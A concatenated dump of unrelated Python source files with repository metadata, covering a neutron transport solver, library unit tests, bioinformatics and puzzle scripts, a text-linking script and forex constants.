psiEdge[n,j] = 2.0*psiCenter[n,j] - psiEdge[n,j+1]
else:
psiCenter[n,j] = Q[j]/sig_t[j]
psiEdge[n,j] = psiCenter[n,j]
psiEdge[n,j+1] = psiCenter[n,j]
for k in range(j-1, i, -1):
psiCenter[n,k] = (delta*Q[k] - psiEdge[n,k+1]*(2*mu + u[k+1]/q[k+1] + u[k]/q[k]))/(-2*mu + delta*sig_t[k] - 2*u[k]/q[k])
psiEdge[n,k] = 2.0*psiCenter[n,k] - psiEdge[n,k+1]
psiCenter[n,i] = 0.5*(psiEdge[n,i] + psiEdge[n, i+1])
i = j + 1
else:
print("error: mu*v + u[i] = 0")
elif mu + u[-1]/q[-1] < 0:
i = I - 1
psiEdge[n,-1] = boundary[n]
psiEdge[n, 0] = boundary[(N-1)-n]
while i > -1:
# print("n = ", n, mu*v + u[i])
if mu + u[i]/q[i] < 0:
psiCenter[n,i] = (delta*Q[i] - psiEdge[n,i+1]*(2*mu + u[i+1]/q[i+1] + u[i]/q[i]))/(-2*mu + delta*sig_t[i] - 2*u[i]/q[i])
psiEdge[n,i] = 2.0*psiCenter[n,i] - psiEdge[n,i+1]
i -= 1
elif mu + u[i]/q[i] > 0:
j = i
while mu + u[j]/q[j] > 0:
j -= 1
if j == 0:
psiCenter[n,j] = (delta*Q[j] + psiEdge[n,j]*(2*mu + u[j+1]/q[j+1] + u[j]/q[j]))/(2*mu + delta*sig_t[j] + 2*u[j+1]/q[j+1])
psiEdge[n,j+1] = 2.0*psiCenter[n,j] - psiEdge[n,j]
else:
psiCenter[n,j] = Q[j]/sig_t[j]
psiEdge[n,j+1] = psiCenter[n,j] # flux out of cells with no in-flux is isotropic
psiEdge[n,j] = psiCenter[n,j]
for k in range(j+1, i, 1):
psiCenter[n,k] = (delta*Q[k] + psiEdge[n,k]*(2*mu + u[k+1]/q[k+1] + u[k]/q[k]))/(2*mu + delta*sig_t[k] + 2*u[k+1]/q[k+1])
psiEdge[n,k+1] = 2.0*psiCenter[n,k] - psiEdge[n,k]
psiCenter[n,i] = 0.5*(psiEdge[n,i] + psiEdge[n, i+1])
i = j - 1
else:
print("error: cant start sweep from left or right. mu = %.2f"%(mu), "mu + u/q = %.3f"%(mu + u[0]/q[0]), "mu + u[I]/q[I] = %.3f"%(mu + u[-1]/q[-1]))
return psiCenter, psiEdge
def phiSolver(psi, w):
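    # (Added note) Scalar flux by angular quadrature: phi_i = sum_n w_n * psi_(n,i).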
N, I = psi.shape
phi = np.zeros((I))
for n in range(N):
phi += w[n]*psi[n,:]
return phi
def fill(I,dx):
# place to write any code to fill cross sections/external source vectors
sig_t = np.zeros(I) # total cross section
sig_s = np.zeros(I) # scattering cross section
sig_f = np.zeros(I)
S = np.zeros(I)
# Pu - 239
# sig_t += 0.32640
# sig_s += 0.225216
# sig_f += 0.081600
# Ur-235
sig_t += 0.32640
sig_s += 0.248064
sig_f += 0.065280
# U - D20
# sig_t += 0.54628
# sig_s += 0.464338
# sig_f += 0.054628
S += 0
Fes = 0.23209488
Fet = 0.23256
U235f = 0.06922744
U235s = 0.328042
U235t = 0.407407
Nas = 0.086368032
Nat = 0.086368032
# multimaterial problem
# for i in range(sig_t.size):
# xpos = dx*(i-0.5)
# if xpos < 0.317337461:
# sig_s[i] = Fes
# sig_t[i] = Fet
# sig_f[i] = 0
# elif xpos < 5.437057544:
# sig_s[i] = U235s
# sig_t[i] = U235t
# sig_f[i] = U235f
# elif xpos < 5.754395005:
# sig_s[i] = Fes
# sig_t[i] = Fet
# sig_f[i] = 0
# else:
# sig_s[i] = Nas
# sig_t[i] = Nat
# sig_f[i] = 0
return sig_t, sig_s, sig_f, S
def materialVel(I,dx, a):
u = np.zeros(I+1)
u += 0.95
# for i in range(u.size):
# xpos = dx*(i-0.5)
# if xpos/a > 0.5:
# u[i] = -0.3
# else:
# u[i] = 0.3
# for i in range(u.size):
# xpos = dx*(i - 0.5)
# if xpos > 4 and xpos < 6:
# u[i] = -30
# else:
# u[i] = 10
# for i in range(u.size):
# xpos = dx*(i- 0.5)
# if xpos/a > 0.75:
# u[i] = 0.3
# elif xpos/a < 0.25:
# u[i] = 0.3
# else:
# u[i] = -0.3
return u
# random constants
# Mass of neutron: 1.675E-27 kg
# 1 eV neutron => 13.83 km/s = 13.83E5 cm/s
# 1 MeV neutron => 13830 km/s
# 1 eV = 1.602E-19 J
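# Sanity check (added): v = sqrt(2E/m) with E = 1 eV = 1.602E-19 J and
# m = 1.675E-27 kg gives sqrt(2*1.602E-19/1.675E-27) ~ 1.383E4 m/s,
# i.e. 13.83 km/s, matching the figure above.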
# a = 2*1.853722
# a = 2*2.256751
a = 2*2.872934
# a = 2*10.371065
# a = 7.757166007
I = 300
N = 10
q = np.zeros(I+1) + 1
nu = 2.7
x = np.linspace(0, a, I)
dx = x[1] - x[0]
sig_t, sig_s, sig_f, S = fill(I,dx)
phi0 = np.zeros(I) + 3
phi0 = phi0/np.linalg.norm(phi0) # do whatever to normalize phi0 to 1
k = 0.8
kprev = 0
Q_f = nu*0.5*sig_f*phi0
errTol = 1E-8
error = 10
it = 1
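# Power iteration (added note): each outer pass solves a fixed-source
# transport problem with the previous fission source, estimates k as the
# norm of the unnormalised flux, renormalises the flux, and repeats until
# k stops changing.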
while error > errTol:
phi, psi = motion1D(a, I, N, Q_f, q)
k = np.linalg.norm(phi)
phi = phi/k
Q_f = 0.5*nu*sig_f*phi
error = np.linalg.norm(k - kprev)
kprev = k.copy()
print("k iteration = ", it, "k = %0.7f"%(k))
it += 1
plt.plot(x,phi)
#%% | UTF-8 | Python | false | false | 8,544 | py | 13 | motion1Dfunction.py | 11 | 0.459621 | 0.405431 | 0 | 283 | 29.194346 | 159 |
HuyaneMatsu/hata | 17,454,747,102,724 | 9dacd81806f3ada278b8f5cd51cd42eaf0fa7a40 | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/sticker/sticker_pack/tests/test__parse_banner_id.py | e2a1a34306a8b3bba09ac2800be8fc42a0a587d7 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | https://github.com/HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | false | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | 2019-12-14T22:03:20 | 2019-12-18T03:46:11 | 2,362 | 2 | 1 | 0 | Python | false | false | import vampytest
from ..fields import parse_banner_id
def test__parse_banner_id():
"""
Tests whether ``parse_banner_id`` works as intended.
"""
banner_id = 202301050003
for input_data, expected_output in (
({}, 0),
({'banner_asset_id': None}, 0),
({'banner_asset_id': str(banner_id)}, banner_id),
):
output = parse_banner_id(input_data)
vampytest.assert_eq(output, expected_output)
| UTF-8 | Python | false | false | 454 | py | 2,953 | test__parse_banner_id.py | 2,919 | 0.590308 | 0.559471 | 0 | 18 | 24.222222 | 57 |
abdallawi/PythonBasic | 3,444,563,780,552 | 607c8c78aa052df12d97f00921084a218295ef0e | 8eb2bf527539608070c5ff783a1e370f8e69bb6b | /data-structures/list/Functions/ZipFunction.py | e6b2a3ec56dcdb4623eb90489f9101a2e8652485 | []
| no_license | https://github.com/abdallawi/PythonBasic | a7e170f99e1719540e42ba795adf9b66ffa11f46 | 82d4b3cfb08ab68776d796caa901ea970bb22b33 | refs/heads/master | 2020-09-10T08:32:19.969355 | 2019-11-14T14:50:23 | 2019-11-14T14:50:23 | 221,703,467 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | products = ['Xiaomi Mi Electric Pro Scooter',
'AMD Ryzen 7 3700X socket AM4 processor',
'Bowers & Wilkins PX5 hoofdtelefoon',
'Blue Microphones Yeti USB microfoon',
]
prices = [549, 359, 299, 129, 253 , 255]
list_combined = list(zip(products, prices, 'ABCDERHGF'))
print(list_combined)
list_combined = list(zip(list_combined, range(10)))
print(list_combined)
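# Note (added): zip() stops at the shortest input, so pairing 4 products with
# 6 prices (and 9 letters) yields only 4 tuples; the extra prices are dropped.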
| UTF-8 | Python | false | false | 412 | py | 98 | ZipFunction.py | 91 | 0.640777 | 0.575243 | 0 | 14 | 28.357143 | 56 |
cvhs-cs-2017/practice-exam-Narfanta | 3,315,714,802,549 | a295e4877041c05c283bddc6e6d48da27a5e6bdd | 8e1c1f10127509c66d01bbdd7972693398f07ea2 | /Functions.py | aec5fc5d802360bd96e8811006166cc53d1e2575 | []
| no_license | https://github.com/cvhs-cs-2017/practice-exam-Narfanta | 6495ad68acc7bde6b2f2c7ad7ea30dff0a75c1ee | 98f48071a47d0f2ca1af41115e912eef7e60933a | refs/heads/master | 2021-01-11T17:44:12.801073 | 2017-01-25T19:22:27 | 2017-01-25T19:22:27 | 79,831,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """1. Write a function that will double any integer (n) and return the result"""
def double(n):
n = int(n)*2
return n
print(double(1890))
"""2. Write a program that will (1) ask the user for an input value, (2) take
that and double it and (3) print the result.
Include necessary print statements and address whitespace issues."""
print(double(input('Please enter a number to double and press enter: ')))
| UTF-8 | Python | false | false | 415 | py | 6 | Functions.py | 6 | 0.708434 | 0.684337 | 0 | 11 | 36.727273 | 80 |
pororodl/LeetCode | 9,182,640,082,213 | 861442998c3a539201435e39d1ac371c5233dcd1 | c3a968a0fe4efe0a4addc69069c76098c8023fa0 | /gcd.py | 45f8053adc1f2827dceefc0655d36af48e8ebac4 | []
| no_license | https://github.com/pororodl/LeetCode | 207f7ed7d24af1563365c32cf1efd07ed4895da2 | 0e093db4990f56d883f124e4c5a4b7317825049b | refs/heads/master | 2020-09-01T16:11:34.064338 | 2020-04-10T12:59:22 | 2020-04-10T12:59:22 | 219,001,937 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
# 最大公倍数,最小公约数
# def gcd(a,b):
# a, b = (a, b) if a >=b else (b, a)
# if a%b == 0:
# return b
# else :
# return gcd(b,a%b)
#
# def lcm(a,b):
# return a*b//gcd(a,b)
#
# a = 25
# b = 65
# print(gcd(a,b))
# print(lcm(a,b))
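# (Added note) The recursive gcd above is Euclid's algorithm,
# gcd(a, b) = gcd(b, a % b), and lcm relies on a * b == gcd(a, b) * lcm(a, b).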
# print('{:.2f}'.format(12.1))
if __name__ == '__main__':
# ar = [1,2,3]
# arr = np.array([1,2,3])
arr = [[1,2],[2,3]]
# ar1 = np.pad(ar,(1,2),'constant',constant_values=(8,9))
arr_e = np.pad(arr,((0,2),(1,1)),'constant',constant_values=(8,9))
# print(arr)
# print(arr_e)
print(arr)
print(arr_e)
# print(type(ar))
print(type(arr_e)) | UTF-8 | Python | false | false | 669 | py | 135 | gcd.py | 135 | 0.474498 | 0.42813 | 0 | 30 | 20.6 | 70 |
dr-dos-ok/Code_Jam_Webscraper | 18,554,258,748,154 | 138dc376e6f10998dbd8ee25b55acaa0604d756f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_203/572.py | 3212ccd8510291e20e0c8615047939abbdbfa006 | []
| no_license | https://github.com/dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
def main():
fname = 'A-large.in'
fname_out = 'A-large.out'
fout = open(fname_out, 'wt')
with open(fname) as fin:
T = int(fin.readline().strip())
print("num of test: %d" % T)
for t in range(1, T+1):
R, C = map(int, fin.readline().strip().split(' '))
cakes = []
for r in range(R):
cakes.append(list(fin.readline().strip()))
#print(cakes)
alp = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
for c in alp:
coor = []
for y in range(R):
for x in range(C):
if c == cakes[y][x]:
coor.append((y,x))
for i in range(len(coor)):
for j in range(i+1, len(coor)):
min_y = min(coor[i][0], coor[j][0])
min_x = min(coor[i][1], coor[j][1])
max_y = max(coor[i][0], coor[j][0])
max_x = max(coor[i][1], coor[j][1])
for y in range(min_y, max_y+1):
for x in range(min_x, max_x+1):
cakes[y][x] = c
#print(cakes)
cakes = np.array(cakes)
#for a in alp:
for i in range(R):
for j in range(C):
a = cakes[i][j]
minx, miny, maxx, maxy = 30, 30, -1, -1
for r in range(R):
for c in range(C):
if cakes[r][c] == a:
minx = min(minx, c)
miny = min(miny, r)
maxx = max(maxx, c)
maxy = max(maxy, r)
if 30 in [minx, miny] or -1 in [maxx, maxy]:
continue
x = minx-1
while x >= 0 and all('?' == item for item in cakes[miny:maxy+1,x]):
cakes[miny:maxy+1,x] = a
minx -= 1
x -= 1
x = maxx+1
while x < C and all('?' == item for item in cakes[miny:maxy+1,x]):
cakes[miny:maxy+1,x] = a
maxx += 1
x += 1
y = miny-1
while y >= 0 and all('?' == item for item in cakes[y,minx:maxx+1]):
cakes[y,minx:maxx+1] = a
miny -= 1
y -= 1
y = maxy+1
while y < R and all('?' == item for item in cakes[y,minx:maxx+1]):
cakes[y,minx:maxx+1] = a
maxy += 1
y += 1
for r in range(R):
for c in range(C):
if cakes[r][c] == '?':
print(t)
print(cakes)
fout.write("Case #%d:\n" % (t))
for r in range(R):
for c in range(C):
fout.write('%s'%cakes[r][c])
fout.write('\n')
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 2,377 | py | 60,747 | 572.py | 60,742 | 0.459403 | 0.440892 | 0 | 84 | 26.297619 | 139 |
mtsolmn/lantz-drivers | 10,187,662,433,067 | 1aca2013d76a3dc469cad9da4daa5f3d2824b022 | 571ad4ef5f3eab79a3a061fc94e86bb99b7d48fb | /lantz/drivers/allied_vision/tests/vimbatest.py | 9268f4a1b96e10507f21449e3eadacde420105cb | [
"BSD-3-Clause"
]
| permissive | https://github.com/mtsolmn/lantz-drivers | d155e1887c91fbbe927aea848a178341b98345b9 | f48caf9000ddd08f2abb837d832e341410af4788 | refs/heads/master | 2023-03-01T14:46:09.555086 | 2021-02-11T22:05:41 | 2021-02-11T22:05:41 | 288,908,250 | 0 | 0 | NOASSERTION | true | 2020-08-20T04:44:18 | 2020-08-20T04:44:17 | 2020-06-26T09:15:19 | 2019-01-21T17:38:48 | 651 | 0 | 0 | 0 | null | false | false | from lantz.drivers.allied_vision import list_cameras
if __name__ == '__main__':
print(list_cameras())
| UTF-8 | Python | false | false | 107 | py | 49 | vimbatest.py | 48 | 0.663551 | 0.663551 | 0 | 4 | 25.75 | 52 |
aayushmittal16/Bioinformatics | 3,925,600,109,501 | 8ac0f5c9e7d27cc0ca536f98c6a21daa589d1515 | 89b12d553700347201436c9edab79c0cd80bc1b0 | /FastestClumpFinder.py | 5e017e526881b01f9d8f29a26e0b0547981ae19f | []
| no_license | https://github.com/aayushmittal16/Bioinformatics | 5260f54f6b6e7f3d419ee91f9a53bc642abf378c | b889c75e345b5a9791b10a09fbc750429e9baae9 | refs/heads/master | 2019-08-05T23:27:13.096249 | 2016-05-29T18:39:20 | 2016-05-29T18:39:20 | 59,925,102 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from time import time
def toString(list):
result = ""
for i in list:
result = result + (str)(i) + " "
result = result[0:len(result) - 1]
return result
#Caches all of the k-mer counts in a hashmap and returns the map with max count
def frequencyComputerTwo(text, k):
map = {}
for i in range(0, len(text) - k + 1):
pattern = text[i:i + k]
if pattern in map:
map[pattern] += 1
else:
map[pattern] = 1
return map
#Put all of the frequent k-mers with count = maxCount in a hashset
def fasterFrequentWords(text, k):
frequentPatterns = set()
maxCount = 0
frequencyMap = frequencyComputerTwo(text, k)
for pattern in frequencyMap:
maxCount = max(maxCount,frequencyMap[pattern])
for i in frequencyMap:
if frequencyMap[i] == maxCount:
frequentPatterns.add(i)
return [frequentPatterns, maxCount]
#Use the fastest clump finder algorithm modified to accomodate caching
def fastestClumpFinder(genome, k, L, t):
clump = set()
text = genome[0:L]
frequency_array = frequencyComputerTwo(text, k)
for i in frequency_array:
if frequency_array[i] >= t:
clump.add(i)
for j in range(1, len(genome)-L+1):
first_pattern = genome[j-1:j - 1 + k]
frequency_array[first_pattern] -= 1
last_pattern = genome[j + L - k: j + L]
if last_pattern in frequency_array:
frequency_array[last_pattern] += 1
else:
frequency_array[last_pattern] = 1
if frequency_array[last_pattern] >= t:
clump.add(last_pattern)
return clump
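# (Added note) Each slide of the window only updates the k-mer that leaves and
# the k-mer that enters, so the whole scan is O(len(genome) * k) instead of
# recounting every length-L window from scratch.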
f = open('dataset.txt','r')
arg0 = f.readline().rstrip()
arg1 = f.readline().rstrip().split(" ")
t0 = time()
# assume the dataset's second line holds the k, L, t parameters (arg1 was
# read above but never used; 9/500/3 were hard-coded)
result = fastestClumpFinder(arg0, int(arg1[0]), int(arg1[1]), int(arg1[2]))
print len(result)
print time() - t0
| UTF-8 | Python | false | false | 1,839 | py | 2 | FastestClumpFinder.py | 1 | 0.614464 | 0.60087 | 0 | 62 | 28.66129 | 79 |
jdiasn/lidarSuit | 6,975,026,929,308 | f5d5697d8ce931ea8faf1d23a46bab561c14d4d6 | 4a4941456ffb6aac9fc2007f2db065de8ef006a7 | /tests/test_wind_prop_retrieval_6_beam.py | bad65c867d9232b0c1e639dffff322622be6e91a | [
"BSD-3-Clause"
]
| permissive | https://github.com/jdiasn/lidarSuit | d0f1d0ae995c3e277fe674d82990371ac7fb7b96 | b6121bfe3a9dca0cbd6b19884372d5eefeea085f | refs/heads/main | 2023-04-16T19:39:05.227399 | 2023-01-04T15:53:46 | 2023-01-04T15:56:51 | 355,915,578 | 11 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
import numpy as np
import xarray as xr
import lidarSuit as lst
def test_six_beam_method_input():
with pytest.raises(TypeError):
lst.SixBeamMethod(data=xr.DataArray(np.array([0, 1])))
def test_get_dummy_six_beam_obj():
elv = np.array([75, 75, 90, 75, 75, 75])
data_elv = xr.DataArray(
elv, dims=("time"), coords={"time": np.arange(len(elv))}
)
azm = np.array([0, 72, 0, 144, 216, 288])
data_azm = xr.DataArray(
azm, dims=("time"), coords={"time": np.arange(len(elv))}
)
data = xr.DataArray(
np.array([1, 1, 1, 1, 1, 1])[:, np.newaxis],
dims=("time", "range"),
coords={"time": np.arange(len(elv)), "range": [1]},
)
data90 = xr.DataArray(
np.array([1, 1, 1, 1, 1, 1])[:, np.newaxis],
dims=("time", "range90"),
coords={"time": np.arange(len(elv)), "range90": [1]},
)
test_ds = xr.Dataset(
{
"elevation": data_elv,
"azimuth": data_azm,
"cnr90": data90,
"gate_index90": data90,
"radial_wind_speed90": data90,
"radial_wind_speed_status90": data90,
"relative_beta90": data90,
"cnr": data,
"gate_index": data,
"radial_wind_speed": data,
"radial_wind_speed_status": data,
"relative_beta": data,
}
)
return lst.GetRestructuredData(test_ds)
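# (Added note) The synthetic dataset above mimics a six-beam lidar scan: five
# beams at 75 deg elevation spaced 72 deg apart in azimuth plus one vertical
# (90 deg) beam, each with a single range gate.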
@pytest.fixture
def test_get_six_beam_obj():
six_beam_obj = lst.SixBeamMethod(
test_get_dummy_six_beam_obj(), freq=6, freq90=6
)
return six_beam_obj
def test_six_beam_method_m_matrix(test_get_six_beam_obj):
assert np.all(np.isfinite(test_get_six_beam_obj.m_matrix))
def test_six_beam_method_m_matrix_inv(test_get_six_beam_obj):
assert np.all(np.isfinite(test_get_six_beam_obj.m_matrix_inv))
def test_six_beam_method_variance_dic(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.radial_variances.keys()) == 2
def test_six_beam_method_radial_variances90(test_get_six_beam_obj):
assert np.all(
test_get_six_beam_obj.radial_variances["rVariance90"].values == 0
)
def test_six_beam_method_radial_variances(test_get_six_beam_obj):
assert np.all(
test_get_six_beam_obj.radial_variances["rVariance"].values == 0
)
def test_six_beam_method_sigma_matrix(test_get_six_beam_obj):
assert np.all(test_get_six_beam_obj.sigma_matrix == 0)
def test_six_beam_method_variance_dim_time(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.var_comp_ds.time.values) == 1
def test_six_beam_method_variance_dim_range(test_get_six_beam_obj):
assert len(test_get_six_beam_obj.var_comp_ds.range.values) == 1
| UTF-8 | Python | false | false | 2,740 | py | 40 | test_wind_prop_retrieval_6_beam.py | 22 | 0.603285 | 0.573723 | 0 | 109 | 24.137615 | 73 |
Sefaria/Sefaria-Data | 15,187,004,405,958 | d7b9e72af90ceaea361260b6192ca9c31c888226 | 1b9bd441c500e79042c48570035071dc20bfaf44 | /sources/Chatam Sofer on TOrah/match.py | f3bf4bed1039ab37af739b682ad556fc7622dfda | []
| no_license | https://github.com/Sefaria/Sefaria-Data | ad2d1d38442fd68943535ebf79e2603be1d15b2b | 25bf5a05bf52a344aae18075fba7d1d50eb0713a | refs/heads/master | 2023-09-05T00:08:17.502329 | 2023-08-29T08:53:40 | 2023-08-29T08:53:40 | 5,502,765 | 51 | 52 | null | false | 2023-08-29T11:42:31 | 2012-08-22T00:18:38 | 2023-07-28T05:31:47 | 2023-08-29T11:42:30 | 3,978,297 | 75 | 59 | 7 | null | false | false | #encoding=utf-8
import django
django.setup()
import codecs
from sefaria.model import *
from sources.functions import *
import csv
from sefaria.system.exceptions import InputError
from linking_utilities.dibur_hamatchil_matcher import *
from sefaria.system.database import db
def dh_func(dh):
dh = dh.replace("*", "").replace(u"אלקים", u"אלהים").replace(u"ה'", u"יהוה")
return [dh.strip() for dh in dh.split(u"וגו'") if len(dh.strip()) > 5]
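# (Added note) A dibur hamatchil is the opening phrase a comment quotes from
# the base text; dh_func strips asterisks, normalises the divine names, and
# splits on the "etc." marker so each fragment can be matched separately.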
dhs = {}
haftara = ""
prev_ref = ""
with open("Chatam_Sofer_on_Torah.csv") as csvf:
for row in UnicodeReader(csvf):
if row[0].startswith("Chatam Sofer"):
ref, text = row
            ref = u" ".join(ref.split()).replace("Chatam Sofer on Torah, ", "")
parasha = u" ".join(ref.split()[:-1])
if ref != prev_ref:
haftara = ""
if text == u"<b>בהפטרה</b>":
try:
haftara = list(db.parshiot.find({"parasha": parasha}))[0]["haftara"]["ashkenazi"][0]
except IndexError as e:
print e
dhs[haftara] = []
parasha = "Parashat "+parasha if not "Parashat" in parasha else parasha
if parasha not in dhs:
dhs[parasha] = []
poss_dhs = re.findall("<b>(.*?)</b>", text)
dh_list = dh_func(poss_dhs[0]) if len(poss_dhs) >= 1 else [""]
if dh_list:
dhs[parasha] += [(ref.split()[-1], haftara, dh_list)]
prev_ref = ref
links = []
del dhs[""]
for parasha, tuples in dhs.items():
    for tup in tuples:
        ref, haftara, dhs = tup
if not dhs:
continue
base_ref = parasha if not haftara else haftara
try:
base_text = TextChunk(Ref(base_ref), lang='he', vtitle="Tanach with Text Only")
except InputError as e:
print e
continue
boundary_flexibility = 100000 # just need a very high number
for i, match in enumerate(match_ref(base_text, dhs, lambda x: x.split(), boundaryFlexibility=boundary_flexibility)["matches"]):
if match:
parasha = parasha.replace("Parashat ", "")
chatam_ref = "Chatam Sofer on Torah, {} {}".format(parasha, ref)
found_base_ref = match.normal()
link = {"refs": [chatam_ref, found_base_ref], "type": "Commentary", "auto": True, "generated_by": "chatam_sofer_on_torah"}
links.append(link)
post_link(links, server="http://ste.sandbox.sefaria.org")
print len(links)
| UTF-8 | Python | false | false | 2,636 | py | 56,261 | match.py | 1,252 | 0.555513 | 0.549005 | 0 | 69 | 36.855072 | 138 |
mikewoudenberg/AOC-2019 | 9,998,683,898,569 | 216bcb7164d27d8b61e28d34d051a6326e82f8aa | 5bf45a590693f3088e86d5074869d56da4683c66 | /assignment24.py | 6be8b23988b44588576af8abb4a0e16f39212425 | []
| no_license | https://github.com/mikewoudenberg/AOC-2019 | 271cbd2a4b26308e30a0a524cffe3830330ecafe | 5295f9aff5cf2c6d4d5d562409aa7f8583d000ae | refs/heads/master | 2020-09-30T21:57:58.080610 | 2019-12-25T10:38:43 | 2019-12-25T10:38:43 | 227,382,822 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from functools import lru_cache
data = """##.#.
##.#.
##.##
.####
.#...
"""
def buildGrid(data):
grid = [0] * 49
data = data.replace('#', '1').replace('.', '0')
for y, line in enumerate(data.split('\n')):
for x, char in enumerate(line):
grid[toCoord(x, y)] = int(char)
return grid
@lru_cache(maxsize=49)
def toCoord(x, y):
return (y + 1) * 7 + x + 1
grid = buildGrid(data)
def getNeighbours(x, y, grid):
return [grid[toCoord(x+1, y)], grid[toCoord(x-1, y)],
grid[toCoord(x, y + 1)], grid[toCoord(x, y-1)]]
def doStep(grid):
newGrid = grid.copy()
for y in range(5):
for x in range(5):
cell = grid[toCoord(x, y)]
neighbours = sum(getNeighbours(x, y, grid))
if cell and neighbours != 1:
newGrid[toCoord(x, y)] = 0
continue
if (neighbours == 1 or neighbours == 2):
newGrid[toCoord(x, y)] = 1
return newGrid
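# (Added note) Part 1 rules: a bug survives only with exactly one adjacent
# bug, and an empty tile becomes infested with one or two adjacent bugs. The
# 7x7 grid is the 5x5 board wrapped in a zero border so neighbour lookups
# never index out of range.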
def getBioDiversity(grid):
result = []
for y in range(5):
for x in range(5):
result.append(grid[toCoord(x, y)])
return int(''.join(map(str, result[::-1])), 2)
grids = set()
grids.add(tuple(grid))
while True:
newGrid = doStep(grid)
gridTuple = tuple(newGrid)
if gridTuple in grids:
        print('Assignment 1: ', getBioDiversity(newGrid))
break
grids.add(gridTuple)
grid = newGrid
| UTF-8 | Python | false | false | 1,431 | py | 28 | assignment24.py | 28 | 0.536688 | 0.518519 | 0 | 64 | 21.359375 | 59 |
iwabuchiken/WS_Others_prog_D-7_2_2_VIRTUAL.20180918_143948 | 1,906,965,519,632 | bcff78f6b12d61fc2abbc58304db87cbb2afb588 | 60031a174ade98bae9bb3cd15c15abfdb7621b46 | /Admin_Projects/mm/libs_mm/cons_fx.py | b44b76a63449e17d41f3cd76725a574f55126faa | []
| no_license | https://github.com/iwabuchiken/WS_Others_prog_D-7_2_2_VIRTUAL.20180918_143948 | 3f5e8569005b3928e525a4a3638b3281fb374025 | cb51878e90cbe3b172e3d30f103759c9e75a344b | refs/heads/master | 2020-03-28T22:27:53.633793 | 2018-09-18T13:42:00 | 2018-09-18T13:42:00 | 149,234,591 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!C:\WORKS_2\Programs\Python\Python_3.5.1\python.exe
from enum import Enum
from Admin_Projects.definitions import ROOT_DIR
from Admin_Projects.definitions import DPATH_ROOT_CURR
TypeOf_Data_OpenClose = "OpenClose"
'''###################
Used in :
libfx : def get_HighLowDiffs(aryOf_BarDatas, id_Start, id_End)
###################'''
class BarData(Enum):
LABEL_OC = "OC"
LABEL_HL = "HL"
LABEL_RSI = "RSI"
LABEL_MFI = "MFI"
LABEL_BB_MAIN = "BB_Main"
LABEL_BB_1S = "BB_1S"
LABEL_BB_2S = "BB_2S"
LABEL_BB_M1S = "BB_M1S"
LABEL_BB_M2S = "BB_M2S"
ROUND_BB = 4
ROUND_RSI = 4
ROUND_MFI = 4
# HighLowDiff_ID_Start = 1
# HighLowDiff_ID_End = 5
# HighLowDiff_ID_Start = 195
# HighLowDiff_ID_End = 202
# HighLowDiff_ID_Start = 219 # 2017.12.18 13:00
# HighLowDiff_ID_End = 226 # 2017.12.16 06:00
HighLowDiff_ID_Start = 243 # 2017.12.15 13:00
HighLowDiff_ID_End = 250 # 2017.12.15 06:00
class FPath(Enum):
fname_In_CSV = "44_1.14_file-io.EURUSD.Period-H1.Days-1900.Bars-45600.20180511_180935.csv"
dpath_In_CSV = DPATH_ROOT_CURR + "\\data\\csv"
fpath_Out_HighLowDiff = "outputs"
### file : output
dpath_Data_Miscs = DPATH_ROOT_CURR + "/data/miscs"
'''###################
gen peak data
###################'''
fname_Gen_PeakData_Dflt = "49_20_file-io.USDJPY.Period-H1.Days-1200.Bars-28800.20180428_073251.csv"
'''###################
general
###################'''
dpath_LogFile = "C:\\WORKS_2\\WS\\WS_Others\\prog\\D-7\\2_2\\VIRTUAL\\Admin_Projects\\curr\\data\\log"
fname_LogFile = "tester_BUSL.log"
'''###################
BUSL_3
###################'''
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160221.SHRINK-2000.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160221.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.USDJPY.Period-H1.Days-6000.Bars-144000.20180813_113150.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-H1.Days-5000.Bars-120000.20180813_115015.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_5_file-io.USDJPY.Period-M5.Days-26000.Bars-26000.20180721_160222.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.USDJPY.Period-H1.Days-6000.Bars-144000.20180813_113150.SHRINK-100.csv"
# BUSL_3_FNAME_PEAK_LIST = "44_3.2_11_file-io.EURJPY.Period-M5.Days-25000.Bars-25000.20180813_120112.SHRINK-100.csv"
